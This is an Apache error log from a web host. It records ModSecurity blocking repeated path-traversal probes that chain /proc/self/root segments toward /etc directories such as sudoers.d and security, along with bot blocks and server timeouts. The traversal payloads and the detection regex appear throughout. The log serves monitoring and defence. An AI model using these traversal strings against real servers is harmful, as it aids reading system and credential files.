[Thu Mar 19 00:50:54.910719 2026] [:error] [pid 14269:tid 140411540502272] [client 74.7.243.128:46644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtyngbLMZ6AikZjR9UM_gAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:51:01.130994 2026] [proxy_fcgi:error] [pid 15051:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42264] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:51:05.086003 2026] [mime_magic:error] [pid 15051:tid 140411590858496] (70014)End of file found: [client 57.141.18.99:46788] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:51:11.734821 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.243.128:53424] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtyrymAPhZkrhU8w4m29gAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:51:23.133842 2026] [proxy_fcgi:error] [pid 30077:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42916] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:51:25.980839 2026] [:error] [pid 27293:tid 140411683178240] [client 74.7.243.128:33386] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtyvf-YZRR_7pZ7nDI-ZwAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:51:32.662311 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.243.128:33394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtyxBkFeYa1D6dYQnCaJwAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 00:51:42.065296 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:44294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtyzvu8EFLIOrSqIptLBQAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 00:51:51.173873 2026] [proxy_fcgi:error] [pid 15051:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:43736] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:52:09.447668 2026] [core:alert] [pid 17887:tid 140411641214720] [client 57.141.18.96:48874] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:52:15.170165 2026] [proxy_fcgi:error] [pid 27293:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:44578] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:52:21.295502 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.228.61:34674] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abty9eyqAr6etmhZHNoUZgAAAFI"]
[Thu Mar 19 00:52:30.909631 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.241.31:38586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abty_imAPhZkrhU8w4m3NgAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 00:52:37.165808 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:45262] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:53:00.130667 2026] [proxy_fcgi:error] [pid 17653:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46026] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:53:14.288042 2026] [mime_magic:error] [pid 15826:tid 140411741927168] (70014)End of file found: [client 57.141.18.53:51000] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:53:23.121813 2026] [proxy_fcgi:error] [pid 27403:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:46780] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:53:49.069812 2026] [proxy_fcgi:error] [pid 15826:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47542] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:54:18.109807 2026] [proxy_fcgi:error] [pid 17653:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:48324] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:54:21.755475 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.244.43:40752] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abtzbSmAPhZkrhU8w4m3dQAAAJc"]
[Thu Mar 19 00:54:33.060097 2026] [mime_magic:error] [pid 27293:tid 140411632822016] (70014)End of file found: [client 57.141.18.21:52336] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:54:54.137815 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49374] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:55:02.021812 2026] [core:alert] [pid 27403:tid 140411624429312] [client 57.141.18.100:54536] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:55:26.126231 2026] [proxy_fcgi:error] [pid 27403:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50444] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:55:50.129794 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:51186] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:56:15.138173 2026] [proxy_fcgi:error] [pid 15051:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51984] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:56:15.997780 2026] [mime_magic:error] [pid 17887:tid 140411716749056] (70014)End of file found: [client 57.141.18.38:55918] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:56:38.130634 2026] [proxy_fcgi:error] [pid 27403:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:52754] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:57:00.130808 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53568] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:57:02.057923 2026] [mime_magic:error] [pid 27403:tid 140411683178240] (70014)End of file found: [client 74.7.241.31:60342] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/lib
[Thu Mar 19 00:57:10.822322 2026] [mime_magic:error] [pid 30077:tid 140411557287680] (70014)End of file found: [client 74.7.241.31:40384] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/cloud
[Thu Mar 19 00:57:10.822458 2026] [access_compat:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:40384] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/cloud
[Thu Mar 19 00:57:13.928564 2026] [mime_magic:error] [pid 17653:tid 140411733534464] (70014)End of file found: [client 57.141.18.74:58764] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:57:22.134438 2026] [proxy_fcgi:error] [pid 27293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:54244] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:57:24.263158 2026] [:error] [pid 27403:tid 140411616036608] [client 74.7.228.61:52524] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt0JBkFeYa1D6dYQnCbhgAAAc8"]
[Thu Mar 19 00:57:32.929070 2026] [mime_magic:error] [pid 26799:tid 140411666392832] (70014)End of file found: [client 57.141.18.10:59120] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 00:57:34.983635 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.241.31:40126] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0LimAPhZkrhU8w4m4AgAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:57:38.355620 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.241.31:38636] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0MgkwaGbbGflqUZBhPAAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:57:42.563722 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:38640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0NuyqAr6etmhZHNoVSwAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:57:46.130108 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55022] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:57:49.114688 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.241.31:38656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0Pfu8EFLIOrSqIptL1gAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:57:53.970070 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:38656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0Qfu8EFLIOrSqIptL2gAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:57:54.815284 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.241.31:38656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0Qvu8EFLIOrSqIptL2wAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:57:56.947914 2026] [:error] [pid 27403:tid 140411725141760] [client 74.7.241.31:41906] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0RBkFeYa1D6dYQnCbrgAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:57:58.668956 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:44458] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0RuoXxyEfFpUF8f_CpQAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:58:00.643138 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:44468] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0SNa6ubjKNq_cu4bpPQAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 00:58:03.120067 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.241.31:44484] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt0S_-YZRR_7pZ7nDI_KQAAA9I"], referer: 